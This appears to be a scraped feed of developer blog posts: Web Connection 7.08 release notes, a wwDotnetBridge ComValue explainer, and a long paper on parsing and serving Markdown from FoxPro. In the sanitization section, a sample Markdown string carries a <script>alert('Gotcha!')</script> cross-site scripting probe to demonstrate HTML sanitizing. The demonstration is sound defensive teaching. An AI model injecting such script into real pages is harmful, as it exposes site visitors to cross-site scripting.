As mentioned Live Reload was initially added in 7.05, initially with a third party requirement for the NPM BrowserSync tool. In 7.06 Web Connection switched to an internal implementation directly inside of the WebConnectionModule.dll so the third party dependency was removed.

In Web Connection 7.08 we've made it even easier to configure Live Reload which has to be enabled explicitly in order to work and reducing the steps to 3 small configuration changes. You can find out more about configuring Live Reload as well as some additional detail on features in the Online Documentation Topic.

Upgrading Live Reload from a previous Version

The configuration for Live Reload has changed how static HTML files are intercepted. There's a new HTML mapping that can be enabled along with Live Reload to handle Live Reload for static HTML files. This removes the need to add a custom module and use runManagedModulesForAllRequests to force all requests through the ASP.NET runtime, which improves performance and simplifies configuration somewhat.

If you are upgrading from 7.06/.05:

  • Remove the <modules> configuration from web.config
  • Map the *.htm* in the <handlers> section to the WC Handler

Detailed configuration info is available in the documentation.

Visual Studio Addin updated for Visual Studio 2019

Microsoft continues to muck with the Visual Studio addin APIs and it's been necessary to update the addin hookups and configuration in order to work with recent versions of Visual Studio 2019. The most recent requirements resulted in the Web Connection module forcing a yellow warning bar during Visual Studio startup.

Starting with Web Connection 7.08, the addin now implements async loading, which was the cause for the warning message. Async loading prevents addins from loading until they are actually invoked from a menu option, helping to improve Visual Studio startup times.

JSON Sizing

Web Connection has support for generating JSON output using standard FoxPro code, which is fairly efficient. In the past however there have been size limitations to the JSON output. While I don't recommend creating massive JSON documents that exceed the FoxPro 16meg string limit, that's now actually supported.

JSON size is limited by the FoxPro 16 meg limit, but due to the inefficiencies of JSON generation presizing a buffer the JSON string parser used an overly pessimistic pre-sized buffer to hold JSON text that is passed to internal APIs.

In v7.08 we changed the logic to maximize the buffer size at FoxPro's Max string size and handle errors if the buffer is overrun more gracefully. This will allow JSON string parsing up to the FoxPro 16 meg limit now where as before it was of the potential max buffer size.

Note that large JSON documents that are even approaching 16 megs are going to be very, very slow to parse even with efficient parsers in other languages like .NET. JSON is a great format for data transfer, but it's not so good with very large documents as the tree parsing requires excessive memory. For this reason I would highly recommend you make sure you are not creating very large JSON files. If you really need to transfer that much data, it's often better to use XML (yes XML parsing is actually faster for larger documents), packed Zip files of actual data files (using EncodeDbf perhaps). But even better is to break up huge data files into smaller more atomic chunks that can be put back together when received.

Upgrading

In order to upgrade existing production applications you'll want to:

  • Delete all FXP files in the project directories
  • Recompile all PRG and VCX files
  • Update DLLs in production apps
  • Update the Web specific files (DLLs, Scripts,CSS)

There's lots of good update information in the Updating from previous Versions topic in the documentation.

Summary

As promised v7.08 is very small update and the primary reason for it was to fix a few small bugs that been fixed. The Live Reload and VS Addin enhancements are a side effect bonus.

Web Connection is a mature product, so changes come less frequently now - most deal with improvements to the development process and updates to the client side libraries and this small incremental update pace every few months is likely to continue.

The good news is that these small incremental upgrades mean minimal work for you to get up to a new version. Happy upgrading…

this post created and published with Markdown Monster

wwDotnetBridge: Getting and Setting COM Unsupported Values with ComValue

$
0
0

wwDotnetBridge lets your FoxPro applications easily access .NET code from FoxPro, without having to register .NET Components as COM objects and with the ability to access any .NET type and type members including types that are not directly supported over COM.

wwDotnetBridge still uses COM, but unlike standard COM Interop with .NET you don't have to instantiate objects via COM, but rather you can use wwDotnetBridge to host the .NET Runtime and provide activation services for object instances. This means any object and any type becomes accessible, while COM interop is very limited on what can be accessed and what types are supported.

ComValue and Types that don't work over COM

One of the reasons you want to use wwDotnetBridge rather than raw COM interop is that you get access to types that are not supported via COM. For example, COM has no support for a number of .NET Types and type formats.

Examples of unsupported types include:

  • Long, Single, Decimal number types
  • Guid, Byte, DbNull, char
  • any Value type
  • Enum Values
  • Any Generic Value or Type

That's a pretty wide swath of types that are inaccessible via COM, but with the help of the ComValue class it's possible to access these types even though you can't access them natively in FoxPro.

ComValue is a facade that provides a wrapper around a .NET Value. It masquerades as a stand-in for the .NET Value and makes it accessible to FoxPro via helper methods that can set and retrieve the .NET value as something that FoxPro can deal with.

How it works

ComValue works by creating a .NET wrapper object with a Value property that holds the actual .NET value and methods that allow setting and retrieving that value - or a translation thereof - in FoxPro. The Value is stored in .NET and is never passed directly to FoxPro because effectively it's not accessible there. Instead you pass or receive a ComValue instance that contains the Value and has conversion routines that allow access to the Value from FoxPro both for setting and getting value.

The idea is simple: The actual raw Value never leaves .NET and the value is always indirectly accessed via conversions that let you set and retrieve the Value as something that works in FoxPro. So DbNull is turned into a null, or a Guid into a string and vice versa for example.

Automatic ComValues

One of the nice - but also often confusing - features of wwDotnetBridge is that it will automatically return ComValue instances for most types that otherwise are incompatible. So when you use wwDotnetBridge's intrinsic helper functions and you pass in or receive back say a .NET Guid it'll automatically convert that Guid into a ComValue that is returned instead.

ComValue results are automatically returned with:

  • GetProperty()
  • InvokeMethod() result values

For example:

loGuid = loBridge.InvokeMethod(loObj,"GetGuid") 
* Get Guid from ComValue
lcGuid = loGuid.GetGuid()

You can pass ComValue objects when using these methods:

  • SetProperty()
  • InvokeMethod() parameters
  • CreateInstance() constructor parameters
  • ComArray.AddItem()

For these methods you create a ComValue instance and set the Value and then pass that to one of the above methods.

lcGuid = GetAGuidStringFromSomewhere()
loGuid = loBridge.CreateValue()
loGuid.SetGuid(lcGuid)

llResult = loBridge.InvokeMethod(loObj,"SetGuid",loGuid)

It's important to understand that it's wwDotnetBridge that understands ComValue instances, not .NET, so you can only pass or receive a ComValue through the above indirect access methods never to a .NET method via direct COM access.

Simple type conversion:

Here's an example of passing a byte/in16 value which natively is not supported back and forth between FoxPro and .NET:

*** Create .NET Object instance
loNet = loBridge.CreateInstance("MyApp.MyNetObject")

*** Convert the 'unsupported' parameter type
LOCAL loVal as Westwind.WebConnection.ComValue
loVal = loBridge.CreateComValue()
loVal.SetInt16(11)

*** Call method that takes Int16 parameter
loBridge.InvokeMethod(loNet,"PassInt16",loVal)

ComValue caching for Method and Property Invocation

ComValue also supports setting a ComValue from properties and method results. This is useful if you have a method or property that uses a type inaccessible via COM (like strongly typed or subclassed dataset objects for example). In this case you can call the SetValueXXX methods to fill the ComValue structure and then use this ComValue in InvokeMethod, SetProperty calls which automatically pick up this ComValue object's underlying .NET type.

*** Create an array of parameters (ComArray instance)
loParms = loBridge.CreateArray("System.Object")
loParms.AddItem("Username")
loParms.AddItem("Password")
loParms.AddItem("Error Message")

*** Create a ComValue structure to hold the result: a DataSet
LOCAL loValue as Westwind.WebConnection.ComValue
loValue = loBridge.CreateComValue()

*** Invoke the method and store the result on the ComValue structure
*** Result from this method is DataSet which can't be marshalled properly over COM
? loValue.SetValueFromInvokeMethod(loService,"Login",loParms)

*** This is your raw DataSet
*? loValue.Value   && direct access won't work  because it won't marshal

*** Now call a method that requires the DataSet parameter
loBridge.InvokeMethod(loService,"AcceptDataSet",loValue)

The jist of this is that the DataSet result is never passed through FoxPro code, but is stored in ComValue and then that ComValue is used as a parameter in the InvokeMethod call. All indirect execution methods (InvokeMethod,SetProperty etc.) understand ComValue and use the Value property for the parameter provided.

Caveats with ComValue

The biggest caveat with ComValue is that it's not obvious that some of wwDotnetBridge's methods automatically return ComValue instances or expect ComValue instances to be passed in. If you are calling a .NET Method that expects a long type value you likely end up passing an integer and wondering why that fails. It fails because it's an unsupported type, but that's not obvious, not easily discoverable and the error message that .NET throws unfortunately also is not conducive to resolving the problem.

Just realize if you call methods that use special types (see list above) and you get messages like Invalid Method Signature or Method not Found or Property 'x' is not found on object Y make sure your signature is correct and examine your .NET signature and make sure the value expected isn't one of the problem children.

So discoverability is not there, but beyond raising awareness with this blog post and the topic in the documentation there's not much I can do unfortunately. I hope this post helps and adds another point of discoverability for this topic.

Summary

ComValue is a powerful helper class that enables scenarios that otherwise would not be accessible to FoxPro.

Resources

this post created and published with Markdown Monster

Article 3

Article 2

Article 1

Article 0

Marking up the World with Markdown and FoxPro

$
0
0

prepared for:Southwest Fox 2018
October 1st, 2018

Markdown has easily been one of the most influential technologies that have affected me in the last few years. Specifically it has changed how I work with documentation and a number of documents both for writing and also for text editing and content storage inside of applications.

Markdown is a plain text representation of HTML typically. Markdown works using a relatively small set of easy to type markup mnemonics to represent many common document centric HTML elements like bold, italic, underlined text, ordered and unordered lists, links and images, code snippets, tables and more. This small set of markup directives is easy to learn and quick to type in any editor without special tools or applications.

In the past I've been firmly planted in the world of rich text editors like Word, or using a WYSIWYG editor on the Web, or for Blog Editing using something like Live Writer which used a WYSIWYG editor for post editing. When I first discovered Markdown a number of years ago, I very quickly realized that rich editors, while they look nice as I type, are mostly a distraction and often end up drastically slowing down my text typing. When I write the most important thing to me is getting my content onto the screen/page as quickly as possible and having a minimal way to do this is more important than seeing the layout transformed as I type. Typing text is oddly freeing, and with most Markdown editors is also much quicker than using a rich editor. I found that Markdown helped me in a number of ways to improve my writing productivity.

Pretty quickly I found myself wishing most or all of my document interaction could be via Markdown. Even today I often find myself typing Markdown into email messages, comments on message boards and even into Word documents where it obviously doesn't work.

For me Markdown was highly addictive. I wanted Markdown in all the places!

Today I write most of my documentation for products and components using Markdown. I write my blog posts using Markdown. The West Wind Message Board uses Markdown for messages that users can post. I enter product information in my online store using - you guessed it - Markdown. This document you're reading now, was written in Markdown as well.

I work on three different documentation tools and they all use Markdown, one with data stored in FoxPro tables, the others with Markdown documents on disk. Heck I even wrote a popular Markdown Editor called Markdown Monster to provide an optimized editing experience, and it turns out I'm not alone in using Markdown with some cool support features that I can build myself because Markdown is a non-proprietary format that can be easily enhanced because it's easy to simple inject text into a text document.

What is Markdown?

I gave a brief paragraph summary of Markdown above. Let me back this up with a more thourough discussion of what Markdown is. Let's start with a quick look at what Markdown looks like here inside of a Markdown editor that provides syntax highlighting for Markdown:

There are of course many more features to Markdown, but this gives you an idea what Markdown content looks like. You can see that the Markdown contains a number of simple formatting directives, yet the document you are typing is basically text and relative clean. Even so you are looking at the raw Markdown which includes all of the formatting information.

And this is one of the big benefits of Markdown: You're working with text using the raw text markup format while at the same time working in a relatively clean document that's easy to type, edit and read. In a nutshell: There's no magic hidden from you with Markdown!

Let's drill into what Markdown is and some of the high-level benefits it offers:

HTML Output Based

Markdown is a plain text format that typically is rendered into HTML. HTML is the most common output target for Markdown. In fact, Markdown is a superset of HTML and you can put raw HTML inside of a Markdown document.

However there are also Markdown parsers that can directly create PDF documents, ePub books, revealJS slides and even WPF Flow Layout documents. How Markdown is parsed and used is really up to the Parser that is used to turn Markdown into something that is displayed to the user. Just know that the initial assumption is that they output is HTML. For the purpose of this document we only discuss Markdown as an HTML output renderer.

Although Markdown is effectively a superset of HTML - it supports raw HTML as part of a document - Markdown is not a replacement for HTML content editing in general. Markdown does great with large blocks of text based such as documentation, reference material, or on Web sites for informational content like About pages, Privacy Policies and the like that are mostly text. Markdown's markup can represent many common writing abstractions like bold text, lists, links, images etc. but the markup itself outside of raw HTML doesn't have layout support. IOW, you can't easily add custom styling, additional HTML <div> elements and so on. Markdown is all about text and few most-used features appropriate for text editing.

Plain Text

One of the greatest features of Markdown is that it's simply plain text. This means you don't need a special editor to edit it. Notepad or even an Editbox in FoxPro or a <textarea> in a Web application is all you need to edit Markdown. It works anywhere!

If you need to edit content and want to create HTML output, Markdown is an easy way to create that HTML output by using a Markdown representation of it as plain text. Markdown is text centric so it's meant primarily for text based documents.

Markdown offers a great way to edit content that needs to display as HTML. But rather than editing HTML tag soup directly, Markdown lets you write mostly plain text with only a few easy to remember markup text "symbols" that signify things like bold and italic text, links, images headers and lists and so on. The beauty of Markdown is that it's very readable and editable as plain text, and yet can still render nice looking HTML content. For editing scenarios it's easy to add a previewer so you can see what you're typing without it getting in the way of your text content.

Markdown makes it easy to represent text centric HTML output as easily typeable, plain text.

Simplicity

Markdown is very easy to get started with, and after learning less than a handful of common Markdown markup commands you can be highly productive. Most of the mark up directives feel natural because a number of them have already been in use in old school typesetting solutions for Unix/Dos etc. For the most part content creation is typing plain text with a handful of common markup commands - bold, italic, lists, images, links are the most common - mixed in.

Raw Document Editing

With Markdown you're always editing the raw document. The big benefit is you always see what the markup looks like because you are editing the raw document not some rendered version of it. This means if you use a dedicated Markdown Editor that helps embedding tags for you you can see the raw tags that are embedded as is. This makes it easy to learn Markdown because even if you use editor tooling you immediately see what that tooling does. Once you get familiar, many markdown 'directives' are quicker to simply type inline rather than relying on hotkeys or toolbar selections.

Productivity

Markdown brings big productivity gains due to the simplicity involved in simply typing plain text and not having to worry about formatting while writing. To me (and many others) this can't be overstated. I write a lot of large documents and this this is a s a minimalist approach. But to me this greatly frees my mind from unneeded clutter to focus on the content I'm trying to create.

Edit with any Editor or Textbox

Because Markdown is text, you don't need to use a special tool to edit it - any text editor, even NotePad will do, or if you're using it in an application a simple textbox does the trick in desktop apps or Web apps. It's also easy to enhance this simple interface with simple convenience features and because it's just plain text it's also very easy to build custom tooling that can embed complex text features like special markup, equations or publishing directives directly into the document. This is why there is a lot of Markdown related tooling available.

Easy to Compare and Share

Because Markdown is text it can be easily compared using Source Control tools like Git. Markdown text is mostly content, unlike HTML so source code comparisons aren't burdened by things HTML tags or worse binary files like Word.

Fast Editing

Editing Markdown text tends to be very fast, because you are essentially editing plain text. Editors can be bare bones and don't need to worry about laying out text as you type, slowing down your typing speed. As a result Markdown editors tend to feel very fast and efficient without keyboard lag. Most WYSIWYG solutions are dreadfully slow for typing (the big exception being Word because it uses non-standard keyboard input trapping).

Developer Friendly

If you're writing developer documentation one important aspect is adding syntax colored code snippets. If you've used Word or a tool that uses a WYSIWYG HTML editor you know what a pain it can be for getting properly color coded code into a document.

Markdown has native support for code blocks as part of Markdown syntax which allows you to simply paste code into the document as text and let the Markdown rendering handle how to display the syntax. The generated output for code snippets uses a commonly accepted tag format:

<pre><code class="language-html">
lcId = SYS(2015)</code></pre>

There are a number of JavaScript libraries that understand this syntax formatting and easily can turn this HTML markup in syntax highlighted code. I use highlightJS - more on that later.

Markdown Transformation

Markdown is a markup format which means, that it is meant to take Markdown text and turn it into something else. Most commonly that something else is HTML, which can then be used for other things like PD, Word or EPub document creation using additional and widely available tools.

Markdown has many uses and it can be applied to a number of different problem domains:

  • General document editing
  • Documentation
  • Rich text input and storage in applications
  • Specialized tools like note editing or todo lists etc.

If you're working in software and you're doing anything with open source, you've likely run into Markdown files and the ubiquitous readme.md files that are used for base documentation of products. Beyond that most big companies are now using Markdown as their primary documentation writing format.

What problem does Markdown Solve?

At this point you may be asking yourself: I've been writing for years in Word - what's wrong with that? or I use an WYSIWYG HTML Editor in my Web Application for rich text input, so what does Markdown provide that these solutions don't?

There are several main scenarios that Markdown (and also other markup languages) addresses that make it very useful.

Text Based

First Markdown is text based which means you don't need special tooling to edit a markdown file. You don't need Word or some HTML based editor to edit markdown. You can use NotePad or a plain HTML text box to write and edit Markdown text and because the Markdown features are very simple text 'markup directives' even using a plain textbox lets you get most of the job done.

You can also use specialized editors - most code editors like Visual Studio Code, Notepad++ or Sublime text all have built in support for Markdown syntax coloring and some basic expansion. Or you can use a dedicated Markdown Editor like my own Markdown Monster.

Using Markdown in FoxPro

In order to use Markdown in any environment you need to use a Markdown parser that can convert Markdown into HTML. Once it's in HTML you need to use the HTML in manner that is useful. For Web applications that usually is as easy as embedding the HTML into a document, but there are number of different variations.

In desktop applications you often need a WebBrowser control or external preview to see the Markdown rendered in a useful way.

Markdown Parsing for FoxPro

The best option for Markdown Parsing for FoxPro is to use one of the many .NET based Markdown parsers that are available. I'm a big fan of the MarkDig Markdown Parser because it includes a ton of support features like Github flavored Markdown that is generally used, various table formats, link expansion, auto-id generation and fenced code blocks out of the box. Markdig is also extensible so it's possible to create custom extensions that can be plugged into Markdigs Markdown processing pipeline.

To access this .NET component from FoxPro I'm going to use wwDotnetBridge. There are a couple of different ways to deal with Markdown parsing, but lets start with the simplest which is just to use the built-in 'just do it' function that Markdig itself provides:

do wwDotNetBridge
LOCAL loBridge as wwDotNetBridge
loBridge = GetwwDotnetBridge()
loBridge.LoadAssembly("Markdig.dll")

TEXT TO lcMarkdown NOSHOW
# Markdown Sample 2
This is some sample Markdown text. This text is **bold** and *italic*.

* List Item 1
* List Item 2
* List Item 3

Great it works!

> ###   Examples are great> This is a block quote with a header

Here's a quick code block

```foxpro
lnCount = 10
FOR lnX = 1 TO lnCount
   ? "Item " + TRANSFORM(lnX)
ENDFOR
ENDTEXT

lcHtml = loBridge.InvokeStaticMethod("Markdig.Markdown","ToHtml",lcMarkdown,null)
? lcHtml
RETURN

Markdown Output

This is the raw code to access the Markdig dll and load it, then call the MarkDig.Markdown.ToHtml() function to convert the Markdown into HTML. It works and produces the following HTML output:

<h1>RAW MARKDOWN WITH Markdig</h1><p>This is some sample Markdown text. This text is <strong>bold</strong> and <em>italic</em>.</p><ul><li>List Item 1</li><li>List Item 2</li><li>List Item 3</li></ul><p>Great it works!</p><blockquote><h3>Examples are great</h3><p>This is a block quote with a header</p></blockquote>

which looks like this:

Keep in mind that Markdown rendering produces an HTML Fragement which doesn't look very nice because it's just HTML without any formatting applied. There's no formatting for the base HTML, and the code snippet is just raw text. To make this look a bit nicer we need to apply some formatting.

Here's that same HTML fragment rendered into a full HTML page with Bootstrap, highlightJs and a little bit of custom formatting applied:

This looks a lot nicer. The idea of this is to use a small template and merge the rendered HTML into it. Here's some code that uses a code based template (although I would probably store the template as a file and load it for customization purposes):

Here's the template:

<!DOCTYPE html><html><head><title>String To Code Converter</title><link href="https://unpkg.com/bootstrap@4.1.3/dist/css/bootstrap.min.css" rel="stylesheet" /><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.3.1/css/all.css"><style>
        body, html {
            font-size: 16px;
        }
        body {
            margin: 10px 40px;
        }
        blockquote {
		    background: #f2f7fb;
		    font-size: 1.02em;
		    padding: 10px 20px;
		    margin: 1.2em;
		    border-left: 9px #569ad4 solid;
		    border-radius: 4px 0 0 4px;
		}
        @media(max-width: 600px) 
        {
            body, html {
                font-size: 15px !important;
            }
            body {
                margin: 10px 10px !important;                
            }
        }</style></head><body><div style="margin: 20px 5%"><%= lcParsedHtml %></div><script src="https://weblog.west-wind.com/scripts/highlightjs/highlight.pack.js" type="text/javascript"></script><link href="https://weblog.west-wind.com/scripts/highlightjs/styles/vs2015.css" rel="stylesheet" type="text/css" /><script>
		function highlightCode() {
		    var pres = document.querySelectorAll("pre>code");
		    for (var i = 0; i < pres.length; i++) {
    		    hljs.highlightBlock(pres[i]);
	    	}
		}
		highlightCode();</script>	</body></html>

and here is the code that parses the Markdown and merges into the template. Notice the <%= lcParsedHtml %> tag that is responsible for merging the parsed HTML into the template

DO MarkdownParser

TEXT TO lcMarkdown NOSHOW
# Markdown Sample 2
This is some sample Markdown text. This text is **bold** and *italic*.

* List Item 1
* List Item 2
* List Item 3

Great it works!

> ###   Examples are great> This is a block quote with a header

ENDTEXT

lcParsedHtml = Markdown(lcMarkdown,2)
? lcParsedHtml

lcTemplate = FILETOSTR("markdownpagetemplate.html")

*** Ugh: TEXTMERGE mangles the line breaks for the code snippet so manually merge
lchtml = STRTRAN(lcTemplate,"<%= lcParsedHtml %>",lcParsedHtml)
showHtml(lcHtml)

Beware of TEXTMERGE

FoxPro's TextMerge command can have some odd side effects - when using << lcParsedHtml >> in the example above, TEXTMERGE mangled the line breaks running text together instead of properly breaking lines based on the Markdown \n linefeed only output. When merging output from an Markdown parser into an HTML document, explicitly replace the content rather than relying on TEXTMERGE.

Using the underlying Parsing

The Markdown() function is very easy and it uses a cached instance of the parser so the Markdown object doesn't have to be configured for each use. If you want a little more control you can the underlying MarkdownParser class directly. This is a little more verbose but gives a little more control.

TEXT TO lcMarkdown NOSHOW
This is some sample Markdown text. This text is **bold** and *italic*.

* List Item 1
* List Item 2
* List Item 3


<script>alert('Gotcha!')</script>
Great it works!> ####  Examples are great> This is a block quote with a header
ENDTEXT

loParser = CREATEOBJECT("MarkdownParser")
loParser.lSanitizeHtml = .T.
lcParsedHtml = loParser.Parse(lcMarkdown)

? lcParsedHtml
ShowHtml(lcParsedHtml)

There's also a MarkdownParserExtended class that adds a few additional features, including support for FontAwesome Icons via syntax and special escaping of <%= %> which are removed from the document before the Markdown Parser runs so it doesn't interfere with the parser.

Sanitizing HTML

Because Markdown is a superset of HTML, you should treat all Markdown captured from users as dangerous.

Let me repeat that:

User Captured Markdown has to be Sanitized

Any user input you capture from users as Markdown that will be displayed on a Web site later should be treated just like raw HTML input - it should be considered dangerous and susceptible to Cross Site Scripting (XSS) Attacks.

You might have noticed the code above that does:

loParser.lSanitizeHtml = .T.

which enables HTML sanitation of the Markdown before it is returned. This flag force <script> tags, javascript: directives and any onXXXX= events to be removed from the output HTML. This is the default setting and it's always what's used when you call the Markdown() function.

Sanitation should usually be on which is why it's the default, but there are a few scenarios where it makes sense to have this flag off. If you are in full control of the content you might have good reason to embed scripts. For example, I use Markdown for Blog posts and occasional I link to code my own snippets on gist.github.com, which requires <script> tags to embed the scripts.

If the content you create is controlled, then this not a problem. In this case I'm the only consumer. If you use Markdown for product descriptions in your product catalog, and the data is all internally created then it's probably safe to allow scripts. But even so - if you don't have scripts, don't allow them. Better safe than sorry - always!

Static Markdown in Web Connection

In addition to the simple Markdown Parsing, if you're using Web Connection there are a couple of useful features built into the framework that let you work with Markdown content.

  • Static Markdown Islands in Scripts and Templates
  • Static Markdown Pages

If you're building Web sites you probably you probably have a bit of static content. Even if your site is mostly dynamic, almost every site has a number of static pages, or a bunch content that is just text like disclaimers or maybe some page level help content. Markdown is usually much easier to type than HTML markup for this lengthy text.

Markdown Islands

Web Connection Scripts and Templates support a special <markdown> tag. Basically you can embed a small block of Markdown into the middle of a larger Script or Template:

<markdown>> ##### Please format your code> If your post contains any code snippets, you can use the `<\>` button> to select your code and apply a code language syntax. It makes it > **much easier** for everyone to read your code.</markdown>

This can be useful if you have an extended block of text inside of a greater page. For example you may have a download page that shows a rich HTML layout for download options, but the bottom half of the page, has disclaimers, licensing and other stuff that's mostly just text (perhaps with very little HTML mixed in which you can do inside of Markdown). Here's that example:

Static Markdown Pages

Sometimes you simply want to add a static page that is all or mostly text. Think about your About page, privacy policy, licensing pages etc. There are other more dynamic use cases as well. For example, you might want to create blog entries as Markdown Pages and simply store them on the server by dropping the page into a folder along with its related assets.

As of Web Connection 6.22 you can now drop a .md file into a folder and Web Connection will serve that file as an HTML document.

There's a new .md script map that Web Connection adds by default. For existing projects you can add the .md scriptmap to your existing scriptmaps for your site and then update the wwScripting class from your Web Connection installation.

There's also a new ~/Views/MarkdownTemplate.wcs, which is a script page into which the Markdown is rendered. Web Connection then generically maps any incoming .md extension files to this template and renders the Markdown into it.

The template can be extremely simple:

<%
    pcPageTitle = IIF(type("pcTitle") = "C", pcTitle, pcFilename)
%><% Layout="~/views/_layoutpage.wcs" %><div class="container"><%= pcMarkdown %></div>

This page simply references the master Layout page and then creates a bootstrap container into which the markdown is rendered. There are two variables that are passed into the template pcMarkdown and pcTitle. The title is extracted from the document either by looking for a Yaml title header:

---
title: Markdown in FoxPro
postId: 432
---
# Markdown in FoxPro
Markdown is... and blah blah blah 

or for the first # Header element towards the top of the document (first 1500 chars).

Once the scriptmap and template are in place you can now simply place a .md document into the site's folder structure and it'll be served as HTML when referenced via the browser.

For the following example, I took an existing blog post I'd written in Markdown Monster as a Markdown file. I set up a folder structure for blog posts that include parts for paths and simply dropped the existing Markdown file and its associated images inot that folder:

And voila - I can now access this file at the specified URL:

https://localhost/wconnect/Markdown/posts/2018/09/25/FixwwDotnetBridgeBlocking.md

The folder structure provides the URL sections that fixes the post uniquely in time which is common for Blog posts. This is an easy way to add a blog to a Web site without much effort at all. Simply write Markdown as a file and copy it to the server. For bonus points integrate this with Git to allow posts to be edited and published using Git.

Using Markdown in Applications

Let's look at a few examples how I use Markdown in my own applications.

West Wind Support Message Board

In a Web Application it's easy to use Markdown and just take the output and stuff it into part of your rendered HTML page.

For example, on my message board I let users enter Markdown for messages that are then posted and displayed on the site:

The message board is available as a Web Connection sample site on GitHub:

The site displays each thread as a set of messages, with each message displaying it's own individual Markdown content. This is a Web Connection application that uses a templates.

The Process class code just retrieves all the messages into a cursor from a business object and then uses Script Page to render the output:

FUNCTION Thread(lcThreadId)
LOCAL loMsgBus

pcMsgId = Request.QueryString("msgId")

loMsgBus = CREATEOBJECT("wwt_Message")
lnResult = loMsgBus.GetThreadMessages(lcThreadId)

IF lnResult < 1
   Response.Redirect("~/threads.wwt")
   RETURN
ENDIF

PRIVATE poMarkdown
poMarkdown = THIS.GetMarkdownParser()

Response.GzipCompression = .T.

*** Don't auto-encode - we manually encode everything
*** so that emojii's and other extendeds work in the
*** markdown text
Response.Encoding = ""
Response.ContentType = "text/html; charset=utf-8"

Response.ExpandScript("~/thread.wwt")

This retrieves a list of messages that belong to the thread and the template loops through them and displays Markdown for each of the messages (simplified):

<%
    pcPageTitle = STRCONV(subject,9) + " - West Wind Message Board"
    pcThreadId = Threadid
%><% Layout="~/views/_layoutpage.wcs" %><div class="main-content">
    ...  page header omitted<div class="thread-title page-header-text" style="margin-bottom: 0;"><%: TRIM(Subject) %></div><!-- Message Loop --><%
    lnI = 0
    SCAN
       lnI = lnI + 1
    %><div id="ThreadMessageList">              <article class="message-list-item" data-id="<%= msgId %>" data-sort="<%= lnI %>">
            ... header omitted<!-- Render the Message Markdown here --><div class="message-list-body"><%=  poMarkdown.Parse(Message,.T.) ) %></div></article></div><% ENDSCAN %></div> 

Note that I'm not using the Markdown function directly, as I'm doing some custom setup and I also want to explicitly force the output to UTF-8 as part of the parsing process (the .T. parameter). The reason I'm using a custom function is that I need to explicitly strip out <% %> scripts before rendering so that they don't get executed as part of user input. I also want all links to automatically be opened in a new window called wwt by having a target added to each and every link tag.

In short I need a customized parser and the generic Markdown() function doesn't quite provide what I need, so I implement my own version that is customize to my needs.

PROTECTED FUNCTION GetMarkdownParser()
LOCAL loMarkdown

PUBLIC __wwThreadsMarkdownParser
IF VARTYPE(__wwThreadsMarkdownParser) = "O"
   loMarkdown = __wwThreadsMarkdownParser
ELSE
	loMarkdown =  CreateObject("MarkdownParserExtended")
	loMarkdown.lFixCodeBlocks = .T.
	loMarkdown.cLinkTarget = "wwt"
	__wwThreadsMarkdownParser = loMarkdown
ENDIF

RETURN loMarkdown
ENDFUNC

This is very similar to what Markdown() does internally, but customized to my own needs. It still caches the parser instance in a global variable so it doesn't have to be recreated for each and every serving which improves performance.

Entering Markdown

The message board also captures Markdown text when users write a new message:

The data entry here is a simple <textarea></textarea>. As mentioned Markdown is just text, so a <textarea> works just fine.

<textarea id="Message" name="Message"
        style="min-height: 350px;padding: 5px; 
        font-family: Consolas, Menlo, monospace; border: none;
        background: #333; width: 100% ; color: #fafafa"><%= Request.FormOrValue('Message',poMsg.Message) %></textarea>

I simply changed the color scheme to use black on white just to make it more 'terminal like' (I happen to like dark themes if you haven't noticed ??). There is also logic to insert special Markdown into the textbox via selections using JavaScript and key shortcuts, but that's just a bonus.

The text is previewed as you type on the client side using a JavaScript component (marked Js) that simply redisplays as the user types a message. Oddly enough - people still seem to screw up posting code constantly, even though the buttons are pretty prominent as the is the message below. Go figure.

Using Markdown for Inventory Item information

A common use case for Markdown is to use it even in desktop applications that need to handle rich information. For example, in my Web Store I use Markdown for the item descriptions that are displayed in the store. I also have an offline application that I primarily use to manage my orders and inventory. The inventory form allows me to enter markdown text as plain text. There's a simple preview button that lets me simply see the content in the default browser.

If it's all good I can upload the item to my Web Server via a Web service and look at the item online where the Markdown is rendered using Markdig as shown before (but using .NET in this case).

The desktop application doesn't use Markdown in other places so here I just do the simplest thing possible in .NET code:

private void btnPreview_Click(object sender, EventArgs e)
{
    var builder = new MarkdownPipelineBuilder()
        .UseEmphasisExtras()
        .UsePipeTables()
        .UseGridTables()
        .UseAutoLinks() // URLs are parsed into anchors
        .UseAutoIdentifiers(AutoIdentifierOptions.GitHub) // Headers get id="name" 
        .UseAbbreviations()
        .UseYamlFrontMatter()
        .UseEmojiAndSmiley(true)
        .UseMediaLinks()
        .UseListExtras()
        .UseFigures()
        .UseCustomContainers()
        .UseGenericAttributes();

    var pipeline = builder.Build();
    
    var parsedHtml = Markdown.ToHtml(Item.Entity.Ldescript,pipeline);

    var html = PreviewTemplate.Replace("${ParsedHtml}", parsedHtml);
    ShellUtils.ShowHtml(html);
}

ShellUtils.ShowHtml(html); is part of Westwind.Utilites and simply takes an HTML fragment or a full HTML document and dumps it to a file, then shows that file in the default browser which is the browser window shown in the previous figure.

Using HTML for Documentation

As mentioned Markdown is great for text entry and documentation creation is the ultimate writing excercise. There are a couple of approaches that can be taken with this. I've two separate tools related to documentation:

  • West Wind Html Help Builder
    An older FoxPro application that stores documentation content in FoxPro tables. The application was updated a while back to use Markdown for all memo style text entry.

  • KavaDocs
    This is a newer tool still under development that uses Markdown files on disk with embedded meta data to hold documentation and related data. The system is based on Git to provide shared editing functionality and collaboration. There are also many integrations with other technologies.

Help Builder and Traditional Help Systems

Help Builder uses FoxPro tables and is a self-contained solution where everything lives in a single tool. Help Builder was designed originally for building CHM files for use - with FoxPro and other tools, and the UI reflects that. In recent years however the focus has been on building Web based output along with a richer Web UI than was previously used.

Help Builder internally uses script templates that are used to handle the layout for each topic type. The following is the main Topic template into a which the content of the oTopic object and its properties that make up the help content is rendered:

